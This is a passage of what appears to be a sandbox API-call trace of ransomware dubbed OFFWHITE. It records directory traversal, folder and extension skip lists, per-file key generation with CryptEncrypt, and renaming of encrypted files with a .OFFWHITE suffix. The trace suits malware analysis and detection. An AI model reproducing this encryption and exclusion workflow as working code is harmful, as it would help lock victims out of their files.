RandomBuffer=0x543b68) returned 1 [0147.618] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.618] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.618] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.618] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.618] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.618] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.618] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.618] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.618] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.619] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.619] SetLastError (dwErrCode=0x0) [0147.619] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.620] GetLastError () returned 0x0 [0147.620] GetLastError () returned 0x0 [0147.620] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x26a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.620] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.620] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x36a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.620] WriteFile (in: hFile=0xb0, lpBuffer=0x526d38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526d38*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.620] GetProcessHeap () returned 0x500000 [0147.620] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16a) returned 0x52ebe8 [0147.620] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.620] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x16a, lpOverlapped=0x0) returned 1 [0147.620] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.620] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x16a, lpOverlapped=0x0) returned 1 [0147.620] GetProcessHeap () returned 0x500000 [0147.621] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.621] CloseHandle (hObject=0xb0) returned 1 [0147.621] GetProcessHeap () returned 0x500000 [0147.621] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.621] GetProcessHeap () returned 0x500000 [0147.621] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.621] GetProcessHeap () returned 0x500000 [0147.621] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.621] GetProcessHeap () returned 0x500000 [0147.621] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.621] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" [0147.621] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.OFFWHITE" [0147.621] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn.offwhite")) returned 1 [0147.621] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x21dc, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="nslist.hxl", cAlternateFileName="")) returned 1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2=".") returned 1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="..") returned 1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="...") returned 1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="windows") returned -1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="$recycle.bin") returned 1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="rsa") returned -1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="ntuser.dat") returned -1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="programdata") returned -1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="appdata") returned 1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="program files") returned -1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="program files (x86)") returned -1 [0147.622] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.622] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="nslist.hxl" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\nslist.hxl") returned="C:/Users\\All Users\\Microsoft Help\\nslist.hxl" [0147.622] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.622] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.622] PathFindExtensionW (pszPath="nslist.hxl") returned=".hxl" [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".exe") returned 1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".log") returned -1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".cab") returned 1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".cmd") returned 1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".com") returned 1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".cpl") returned 1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".ini") returned -1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".dll") returned 1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".url") returned -1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".ttf") returned -1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".mp3") returned -1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".pif") returned -1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".mp4") returned -1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".OFFWHITE") returned -1 [0147.622] lstrcmpiW (lpString1=".hxl", lpString2=".msi") returned -1 [0147.622] lstrcmpiW (lpString1="nslist.hxl", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.623] GetProcessHeap () returned 0x500000 [0147.623] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526d48 [0147.623] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.624] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=8668) returned 1 [0147.624] GetProcessHeap () returned 0x500000 [0147.624] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.624] GetProcessHeap () returned 0x500000 [0147.624] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.624] GetProcessHeap () returned 0x500000 [0147.624] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.624] GetProcessHeap () returned 0x500000 [0147.624] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.624] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.624] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.624] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.624] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.624] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.624] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.624] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.624] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.624] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.624] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.624] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.624] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.625] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x21dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.625] SetLastError (dwErrCode=0x0) [0147.625] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.627] GetLastError () returned 0x0 [0147.627] GetLastError () returned 0x0 [0147.627] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x22dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.627] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.627] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x23dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.627] WriteFile (in: hFile=0xb0, lpBuffer=0x526d48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526d48*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.628] GetProcessHeap () returned 0x500000 [0147.628] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x21dc) returned 0x5667c8 [0147.628] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.628] ReadFile (in: hFile=0xb0, lpBuffer=0x5667c8, nNumberOfBytesToRead=0x21dc, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesRead=0x295e540*=0x21dc, lpOverlapped=0x0) returned 1 [0147.632] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.632] WriteFile (in: hFile=0xb0, lpBuffer=0x5667c8*, nNumberOfBytesToWrite=0x21dc, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesWritten=0x295e54c*=0x21dc, lpOverlapped=0x0) returned 1 [0147.632] GetProcessHeap () returned 0x500000 [0147.633] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5667c8 | out: hHeap=0x500000) returned 1 [0147.633] CloseHandle (hObject=0xb0) returned 1 [0147.633] GetProcessHeap () returned 0x500000 [0147.633] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.633] GetProcessHeap () returned 0x500000 [0147.633] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.633] GetProcessHeap () returned 0x500000 [0147.633] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.633] GetProcessHeap () returned 0x500000 [0147.633] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.633] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\nslist.hxl" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\nslist.hxl") returned="C:/Users\\All Users\\Microsoft Help\\nslist.hxl" [0147.633] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\nslist.hxl", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\nslist.hxl.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\nslist.hxl.OFFWHITE" [0147.633] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\nslist.hxl.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl.offwhite")) returned 1 [0147.634] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x21dc, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="nslist.hxl", cAlternateFileName="")) returned 0 [0147.634] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0147.634] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2=".") returned 1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2="..") returned 1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2="...") returned 1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2="windows") returned -1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2="$recycle.bin") returned 1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2="rsa") returned -1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2="ntuser.dat") returned -1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2="programdata") returned -1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2="appdata") returned 1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2="program files") returned -1 [0147.634] lstrcmpiW (lpString1="Mozilla", lpString2="program files (x86)") returned -1 [0147.634] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\All Users\\" | out: lpString1="C:/Users\\All Users\\") returned="C:/Users\\All Users\\" [0147.634] lstrcatW (in: lpString1="C:/Users\\All Users\\", lpString2="Mozilla" | out: lpString1="C:/Users\\All Users\\Mozilla") returned="C:/Users\\All Users\\Mozilla" [0147.634] lstrcatW (in: lpString1="C:/Users\\All Users\\Mozilla", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Mozilla\\") returned="C:/Users\\All Users\\Mozilla\\" [0147.634] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\All Users\\Mozilla\\" | out: lpString1="C:/Users\\All Users\\Mozilla\\") returned="C:/Users\\All Users\\Mozilla\\" [0147.634] lstrcatW (in: lpString1="C:/Users\\All Users\\Mozilla\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Mozilla\\*.*") returned="C:/Users\\All Users\\Mozilla\\*.*" [0147.634] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Mozilla\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0147.635] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.635] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0147.635] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.635] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.635] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="logs", cAlternateFileName="")) returned 1 [0147.635] lstrcmpiW (lpString1="logs", lpString2=".") returned 1 [0147.635] lstrcmpiW (lpString1="logs", lpString2="..") returned 1 [0147.635] lstrcmpiW (lpString1="logs", lpString2="...") returned 1 [0147.635] lstrcmpiW (lpString1="logs", lpString2="windows") returned -1 [0147.635] lstrcmpiW (lpString1="logs", lpString2="$recycle.bin") returned 1 [0147.635] lstrcmpiW (lpString1="logs", lpString2="rsa") returned -1 [0147.635] lstrcmpiW (lpString1="logs", lpString2="ntuser.dat") returned -1 [0147.635] lstrcmpiW (lpString1="logs", lpString2="programdata") returned -1 [0147.635] lstrcmpiW (lpString1="logs", lpString2="appdata") returned 1 [0147.635] lstrcmpiW (lpString1="logs", lpString2="program files") returned -1 [0147.635] lstrcmpiW (lpString1="logs", lpString2="program files (x86)") returned -1 [0147.635] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Mozilla\\" | out: lpString1="C:/Users\\All Users\\Mozilla\\") returned="C:/Users\\All Users\\Mozilla\\" [0147.635] lstrcatW (in: lpString1="C:/Users\\All Users\\Mozilla\\", lpString2="logs" | out: lpString1="C:/Users\\All Users\\Mozilla\\logs") returned="C:/Users\\All Users\\Mozilla\\logs" [0147.635] lstrcatW (in: lpString1="C:/Users\\All Users\\Mozilla\\logs", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Mozilla\\logs\\") returned="C:/Users\\All Users\\Mozilla\\logs\\" [0147.635] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Mozilla\\logs\\" | out: lpString1="C:/Users\\All Users\\Mozilla\\logs\\") returned="C:/Users\\All Users\\Mozilla\\logs\\" [0147.635] lstrcatW (in: lpString1="C:/Users\\All Users\\Mozilla\\logs\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Mozilla\\logs\\*.*") returned="C:/Users\\All Users\\Mozilla\\logs\\*.*" [0147.635] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Mozilla\\logs\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0147.636] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.636] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0147.636] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.636] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.636] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb07822e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa4, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="maintenanceservice-install.log", cAlternateFileName="MAINTE~1.LOG")) returned 1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2=".") returned 1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="..") returned 1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="...") returned 1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="windows") returned -1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="$recycle.bin") returned 1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="rsa") returned -1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="ntuser.dat") returned -1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="programdata") returned -1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="appdata") returned 1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="program files") returned -1 [0147.637] lstrcmpiW (lpString1="maintenanceservice-install.log", lpString2="program files (x86)") returned -1 [0147.637] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Mozilla\\logs\\" | out: lpString1="C:/Users\\All Users\\Mozilla\\logs\\") returned="C:/Users\\All Users\\Mozilla\\logs\\" [0147.637] lstrcatW (in: lpString1="C:/Users\\All Users\\Mozilla\\logs\\", lpString2="maintenanceservice-install.log" | out: lpString1="C:/Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log") returned="C:/Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" [0147.637] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.637] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.637] PathFindExtensionW (pszPath="maintenanceservice-install.log") returned=".log" [0147.637] lstrcmpiW (lpString1=".log", lpString2=".exe") returned 1 [0147.637] lstrcmpiW (lpString1=".log", lpString2=".log") returned 0 [0147.637] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb07822e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa4, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="maintenanceservice-install.log", cAlternateFileName="MAINTE~1.LOG")) returned 0 [0147.637] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0147.637] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="logs", cAlternateFileName="")) returned 0 [0147.637] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0147.637] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2010, 